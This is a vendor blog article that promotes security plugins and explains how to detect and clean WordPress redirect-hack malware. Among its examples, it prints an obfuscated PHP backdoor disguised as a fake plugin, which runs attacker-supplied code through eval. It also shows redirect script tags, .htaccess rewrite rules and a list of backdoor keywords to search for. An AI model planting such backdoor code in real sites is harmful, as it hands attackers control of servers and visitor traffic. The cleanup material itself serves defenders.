How To Remove Malicious Redirects

21 min read

How Do You Get Rid Of Malicious Redirects On Your Website?

When a person visits your WordPress website, does it automatically redirect them to another site? The fact that there is no way to tell what is going on might be baffling and disturbing when this occurs. The unauthorized redirection on your WordPress website is evidence of a redirect hack on your WordPress site. Don’t be concerned; we can aid you in settling the situation if necessary. To begin, you must do a scan on your WordPress site to determine whether or not it has been compromised.

It is quite uncomfortable to have a hacked WordPress redirect issue because website traffic is diverted, organic traffic decreases, and the bounce rate increases dramatically. None of this, on the other hand, is nearly as damaging as losing your clients’ trust. As a result, it is vital to resolve these hacks as soon as possible. More damage is done by delaying action on the WordPress redirection hack for an extended period of time.

TL;DR: Using a best-in-class security plugin, you can quickly resolve the spam redirection issue on your WordPress website. The longer a hacker is allowed to remain on your website, the more serious the situation will become for everyone involved. Consequently, it is vital to act quickly and disinfect your website with MalCare as soon as possible.

What is WordPress redirect hack?

A WordPress redirect hack is a sign that malware has been introduced into your WordPress website. This software sends all of your visitors to spam websites, which typically sell illegal things or pharmaceutical products that are either not authorised to be promoted normally or are tightly regulated.

In fact, advertising banned products or services can result in the suspension of a Google Ads account.

WordPress hacked redirect is a very common malware symptom affecting thousands of websites every day. While this hack is fixable, it is important to do so fast. Time is of utmost importance when dealing with hacks because the more you wait, the more files and database tables on your site are going to get affected.

How to know if your website is being redirected to another site?

If your WordPress site is diverting to another spam site, it is likely that your site has been infected with the redirect hack malware. However, due to the nature of this hack, it may not occur every time. In reality, hackers can configure it so that it only happens once for each IP address, giving the administrator the impression that it was a one-time occurrence.

However, the chances of it being an improper reroute or a one-time malfunction are almost nil. As a result, before we can begin to fix the redirect hack, we must first confirm it. To determine if your website is infected with the WordPress redirect hack, search for common indicators and then confirm it with a proper scan.

Look out for symptoms of WordPress redirect hack

There is no single sign that can confirm a hack. WordPress redirect hack malware can manifest itself in a variety of ways, and it is completely unpredictable. However, some symptoms reoccur in multiple cases. If you detect more than two of these indications, your website has most likely been hacked.

  • WordPress site redirecting to spam site:The redirect itself is the first and most evident indicator of a WordPress hacked redirect infection. Some redirects may route your website users to a spam site, while others may direct you from the login page, thereby locking you out of your website.
    • Automatic redirects: Automatic redirects are the most prevalent sort of redirect. These take your users directly to spam sites from your website or even from Google search results.
    • Link redirects: When a visitor clicks on a link, it redirects them to a new location. Given that visitors anticipate to be directed to a specific landing page after clicking on a link, this form of redirect is particularly dangerous.
    • Mobile-only redirects: These redirects only happen if someone visits your website from a mobile device.
  • Google results flag your website: Google is extremely concerned about the safety of its consumers’ search experiences. If Google suspects malware on your website, it will display a ‘This site may be hacked’ statement beneath your website’s search results.
  • Google blacklist: Every day, Google blacklists around 10,000 domains to ensure that no hazardous website can harm its visitors. Getting your website on Google’s blacklist is a nightmare for your SEO efforts, since Google will delist your website. Furthermore, many other browsers, search engines, and web servers use Google’s blacklist to detect harmful websites.
  • Google Ads flag scripts on your website:If you have adverts on your website, Google can detect any redirection scripts and flag your page. Google is extremely concerned about the safety of the advertising it runs, so the odds of false positives are extremely minimal.
  • Web host has suspended your account: While web servers may suspend your account for a variety of reasons, the most prevalent one is malware. You may receive an email from your web host informing you of the reason for the suspension. If so, you may always contact them for explanation and request the scan findings so you can get a head start on locating the malware.
  • Visitor feedback: As previously explained, malware is meant to remain concealed from the administrator. So, while you may not notice any symptoms, your visitors will. So pay heed to any complaints or criticism concerning random redirects that your website users may provide.

Do not be alarmed if you encounter these symptoms. Instead, try to keep a journal of these symptoms. Information can assist you in determining the specific nature of the hack and resolving it as soon as possible.

Confirm the WordPress hacked redirect infection

You are aware of the signs to look for and have a general understanding of how hackers may show themselves on your WordPress site, but it is still critical to validate the existence of a WordPress redirect hack if you suspect one. Because symptoms are not a surefire method of determining this, scanning is necessary to be effective.


Scan using an online scanner

Online scanners are an excellent starting point for your diagnostic process. These scanners search for malware in the areas of your website that are visible to the public. Given that malware can lurk everywhere on your WordPress site, these are ineffective for full diagnosis but can be used in conjunction with other methods.

Scan WordPress site manually

It takes a lot of time to manually scan for malware on WordPress that has been hacked and redirects to other websites. We don’t want you to do that, either. A security plugin can do this a lot faster and more efficiently than you can do it on your own. People do manual scanning to look for “junk code” in their website code. They go through every single line of it to look for it.

There are so many different kinds of malicious code that it’s like looking for a needle in a haystack to find one. However, if you need to scan by hand, this is how you can do it. One of the easiest ways to look for malware on your own is to look at the files that have been recently updated on your website. If you haven’t changed the files, they’re likely to be infected. Make sure to do this for the database as well. That may not always work, though, because hackers can change the timestamps on files to make them look older than they are. They can do this for months or even just a few days.

Where to locate redirect malware

As with any other type of malware, the WordPress redirect malware can hide anywhere on your WordPress site. Additionally, because there are varieties of the redirect virus, the code for each one may seem slightly different. As a result, we are unable to provide an exact blueprint of the code to look for, but if you are familiar with your website’s coding, you can look for weird code in the following locations.

Related Post  Headless WordPress


  • WordPress core files: The wp-admin and wp-includes files are the two most important files in the WordPress core. These files contain no user content and should be identical to the fresh instals available from the WordPress repository. Check that the version you’re comparing your website to is the same as the one you have installed on your site. If you notice any extra code in these files, it is possible that it is malware.

The.htaccess file is the next thing you should look for. If the WordPress mobile redirect hack is present on your website, this file contains the evidence of it. Look for any redirect scripts in this file and make a note of them for future reference.

  • Active theme files: Your theme files are a fantastic area to hunt for viruses as well. Check the header.php, footer.php, and functions.php files in the active theme folder first. You can compare the code to fresh theme instals, but keep in mind that customizations may appear as extra code.
  • Malware might disguise itself as false plugins on your website to confuse you. Going to the wp-contents folder and inspecting all of the plugin files there is a good technique to hunt for fraudulent plugins. If you find any duplication or strangely titled plugins, it is likely that they are malware. For example, we recently discovered these

/wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php Note: You don’t need to search any further if you utilise nulled themes or plugins on your WordPress site, because you’ve almost likely been hacked through them.


  • wp-posts table: Now you must search your database. If you can’t browse through all of the posts in your wp-posts database, look at a good percentage of them. Because, while malware typically appears on every page, hackers can conceal it to make it difficult to detect.
  • wp-options table: Look for the siteurl in this table. If it isn’t your website URL, reroute malware has most likely changed it to go to a spam website instead.


Other ways to look for malware

While scanning is the most effective approach to validate a WordPress redirect hack, there are other ways to search for malware on your WordPress site. Because hacking symptoms are rarely constant, administrators frequently leave hacks ignored for longer than necessary. As a result, it is critical to frequently monitor your website for any suspicious activity. Here are several methods for detecting redirect malware on your website.

  • To visit your website, use an incognito browser. Hackers frequently create malware in such a way that the symptoms are not evident to the administrator. This allows you to view what common visitors see.
  • Examine activity logs for any odd behaviour, such as the creation of new posts or the escalation of user rights. Consider getting an activity log if you don’t already have one. It is a great tool for troubleshooting any issues with your website.
  • Check the Google search console and the security problems tab to determine whether Google has identified any malware on your website.


How to remove WordPress hacked redirect infection from your site

Detecting and removing malware from your website is only half the battle. The most crucial aspect is now over, and that is the cleanup. There are two methods for removing a WordPress hacked redirect virus from your website.

 Remove redirect hack malware manually

Before we go into how you can manually clean your WordPress site, we’d want to emphasise that this is not suggested, and there are multiple things that can go wrong when doing so. We frequently receive websites for cleanup that could have been cleaned in minutes, but human cleaning efforts ruined the site, making it a work and a half. So, before you go this way, think about utilising a security plugin once more. If you still want to clean up your site manually, here’s how to do it step by step.

  • Backup your website with BlogVault

The first step is to back up your website, preferably on a separate server than your website’s. This is a failsafe in case the cleanup goes awry or ruins your site. Even if your website has been hacked, it is still functional, which is preferable to having to start from scratch. BlogVault enables you to create secure backups that are easy to restore and are kept on offsite servers.

You’ll need a clean files reference to clean your WordPress site. As a result, you’ll need to download fresh copies of WordPress core, themes, and plugins from the WordPress repository. It is critical that the versions of these files match those on your website in order to ensure that the basic code is the same.

  • Reinstall WordPress core

Now comes the hard part: cleaning up. To begin, restore the WordPress core files. Because the wp-admin and wp-includes files contain no user content, you can completely replace them. The following step is to search for any unusual or suspicious code in the following files:

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

You must carefully eliminate any malware that you discover in these files. Make certain that you are simply deleting malware; otherwise, deleting anything critical may cause your site to fail or behave erratically.

We can’t tell you what to check for because malware can seem like any other code. This is why manual cleansing of your site requires a basic comprehension of code logic. After you’ve finished this, look under the wp-uploads folder. Is there any PHP code in it? If so, remove them because the wp-uploads folder is not supposed to include any PHP files.

  • Clean themes and plugins files

The themes and plugins files can be found in the wp-contents folder of your website. Begin by comparing each theme and plugin file to the freshly downloaded instals from the repository. To compare, you can utilise an online diffchecker because going over every line of code manually might be time-consuming.

Look for modifications in your version of the files and try to identify whether this is due to customization or infection, as modifying your themes or plugins can affect the code. Now, carefully remove the malware that you discovered. Examine your plugins for any bogus plugins or newly found vulnerabilities. If you haven’t updated your files since the vulnerability was revealed, you’ll need to update the plugin and scan the plugin file for malware.

  • Clean database tables

The identical procedure must be followed for your database tables. You can use phpMyAdmin to access your database tables. Look for malware in the following tables in particular:

  • wp-posts
  • wp-options

If the infection was detected during the scanning process, you can carefully delete the harmful script from your database tables and clean it up.

  • Remove backdoors

After you’ve cleaned up, you’ll need to address the source of the hack. Backdoors on your website are frequently the source of hacks. A backdoor is a flaw in your website’s coding that hackers can use to get access to it. Unless you remove these backdoors, your website can be easily hacked again. You can look for the following terms, which are frequently found in backdoors:

  • eval
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

These keywords, however, may not always indicate infection. They are also utilised in genuine themes and plugins from time to time.

  • Reupload clean files

It’s time to re-upload clean files to your WordPress site. This will necessitate the use of both File Manager and phpMyAdmin. The technique is quite similar to manually restoring a backup, so for more information, see our full tutorial on restoring backups. You’ll need to delete the files one by one before uploading the cleaned versions to your WordPress site.

  • Remove cache

You’re nearly there. Even if you have cleaned your website, there may still be virus remnants on it. This is due to the website cache storing a version of your site for speedier loading. This version may also include malware. As a result, in order to totally remove your website of malware, you must thoroughly clear the cache.

  • Use a security scanner to confirm

Congratulations, your cleanup is complete! Use a security scanner to scan your site to ensure that the cleanup was successful. You’re good to go if it discovers no evidence of malware. If not, you might want to look into other cleaning methods.

What does the WordPress redirect hack malware look like?

Malware does not arrive in the same way every time. Particularly when it comes to malware as adaptable as the WordPress redirect. However, we have a few examples to show you how it could look on your website. It goes without saying that you should not rely on these examples to diagnose your website; they are simply meant to serve as a guide.

  • Some code that you can find on the wp-posts table or hidden on a page header may look like this.
<script type='text/javascript' src='//;ver=5.7.2' id='hello_newscript5-js'></script> < <script type='text/javascript' async src=''></script> < < <


  • The wp-options table may also hide the redirect malware, which can sometimes look like this.


  • The malware code is often obfuscated, and you will have to deobfuscate the same using online tools. The obfuscated code can look like the following.


Related Post  Popular WordPress blogs on the internet

When deobfuscated, it looks like this.


  • Malware often hides in fake plugins, and when you open the files, it looks like this.
<?php /** * Plugin Name: Wp Zzz * Plugin URI: * Description: Default WordPress plugin * Author: WPForms * Author URI: * Version: * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo '<'; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );


  • Mobile specific redirect malware can look something like this. You can find it in the .htaccess file.
<IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^.+\.txt$ [L] RewriteRule ^.+\.htm$ [L] RewriteRule ^.+\.html$ [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . [L] </IfModule> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>

How did your site get infected with the WordPress redirect hack?

You may be wondering how your website became infected with the WordPress redirection hack in the first place after this rollercoaster trip of clearing up your website. There are various possible explanations for this, which we shall examine, but first, let us understand why websites are hacked in the first place.

WordPress websites are built for functionality and personalization, therefore each WordPress site is a maze of code. In essence, this code cannot be bulletproof since it was developed by someone, and there is always the possibility of human error. So, while you can make your WordPress site as bulletproof as feasible with the correct protection, it will not be invulnerable if you do not follow security best practises.

Some of the most likely reasons for your site getting infected with the WordPress redirect hack are:

  • Vulnerabilities in the themes and plugins
  • Nulled themes and plugins
  • Undiscovered backdoors
  • Brute force attacks
  • Not using SSL
  • XSS attacks
  • Weak passwords and compromised user accounts.

Whatever the reason, you can always prevent hacks with the correct security policies and keep virus harm to a bare minimum. All you need to do is improve the security of your website using a few basic procedures.

How to prevent WordPress redirection hacks in the future?

Hackers’ nature is such that they continually reappearing. This is frequently due to the fact that most people do not comprehend that website security is not a one-time event. You will need a comprehensive plan and defensive steps to keep your WordPress website from being hacked and redirected to spam sites in the future. This does not necessarily imply that you are doomed. In fact, if you merely take a few precautions, you can prevent being hacked.

 Install SSL

SSL enables you to encrypt all communication to and from your website. This means that no one may intercept data sent or received by your website and obtain unwanted access. Because Google actively penalises non-SSL sites, installing SSL will also help you enhance your SEO.

Update your WordPress core, themes, and plugins

Your website is code, and where there is code, there is vulnerability. However, these flaws are addressed as soon as they are detected. You may also safeguard your website against attacks by updating your WordPress core, themes, and plugins on a regular basis. Installing a backup plugin like BlogVault and using a staging server to test the results before submitting updates to your live site will keep everything safe.

Choose strong passwords

Weak passwords continue to be the top source of hacks. And, while remembering strong passwords can be challenging, you don’t have to. You may use a password manager to save all of your passwords, making it easier to log in and safeguard your website.

Harden WordPress

WordPress advises a number of security steps to improve the security of your WordPress site, such as two-factor authentication, preventing PHP execution in specific folders, and so on. WordPress hardening refers to the combination of these approaches. MalCare automates all of this with the push of a button, making it absolutely painless.


Impact of WordPress site redirecting to spam sites

When your WordPress website gets sent to another spam site as a result of a hack, this is obviously negative for you. However, the impact of a redirect hack extends far beyond poor user experience. If not addressed immediately, a WordPress redirection hack can result in a slew of headaches.

Revenue reduction

Redirects essentially interrupt the customer’s journey through your website. If they intended to visit your site and peruse your products, they will not be able to do so because they were routed to a spam site before to reaching the merchandise. This has an adverse effect on conversion rates and leads in revenue loss. This loss is multiplied several times if the hack is not discovered and rectified in a timely manner.

Loss of data

The redirects caused by the malware are only one of the hack’s symptoms. The far more concerning indication is that hackers have now gained access to your website. This means they have access to your and your customers’ private information. They may opt to sell the data or completely destroy it, which will cost you more than money.

Customers lose faith in you.

When a firm is hacked, it frequently results in client distrust. Damage control may be easier in the case of hacks that are not visible to customers. However, the redirect hack on your WordPress site is visible to your clients, which might cause them to lose all trust in your business’s security.

SEO’s effect

Search engines do not want its customers to see compromised websites by accident. As a result, they punish malware-infected websites. This could mean they add a caution to your website’s search results, display a large red warning before they visit it, or even delist you entirely. This undermines your SEO efforts, and you will almost certainly notice a decline in organic traffic.

Legal ramifications

Many regions have strict data protection rules that prohibit third-party sharing without consent. If your data is compromised, even as a result of a cyberattack, you may face legal repercussions.

F.A.Q – How To Remove Malicious Redirects

My website has been redirected to a different domain. What am I to do?

If your WordPress website is redirecting visitors to another domain or to spam pages, it is most likely that your website has been hacked by the WordPress redirect hack malware. You will have to authenticate the hack by scanning your website for free with a security plugin like MalCare. If it detects a breach, you simply need to upgrade your account and click the auto-clean option. And your site will be spotless in a matter of minutes!

Why does my website redirect to Google spam?

The most frequent cause of spam redirects is a hacked WordPress redirect virus. This exploit sends your visitors to spam websites in order to piggyback on your traffic and increase it. Typically, these spam sites sell illegal goods or drugs that they are unable to advertise directly.

How to identify a malware redirection attack on WordPress?

If your website is diverting to a spam site, this is the most obvious sign of a WordPress spam redirect hack. However, hackers do not want you to discover the hack, which is why they include conditions that render it invisible to the administrator. As a result, you may be unaware of the redirection. In this situation, you must run a MalCare scan on your website. MalCare will thoroughly analyse your website and identify any hacks immediately, allowing you to begin the cleanup procedure.

Conclusion – How To Remove Malicious Redirects

While a WordPress redirect hack is one of the more typical types of attacks, it is nonetheless incredibly detrimental to a business. The good news is that if you act quickly enough, you can simply limit the hazards. Security plugins are designed to assist you in avoiding such hacks via firewalls and to inform you immediately if one occurs. This helps you save precious hours that could be the difference between a close call and a significant loss. We choose MalCare because of its constantly evolving algorithm and intelligent firewall, but any security plugin is an excellent place to start when it comes to website security.


    • You’re welcome! I’m glad you found the article helpful. If you have any more questions or need further assistance, feel free to ask. I’m here to help!

    • You’re welcome! I’m glad you found the article helpful. If you have any more questions or need further assistance, feel free to ask. I’m here to help!

Leave a Reply

Your email address will not be published. Required fields are marked *

CommentLuv badge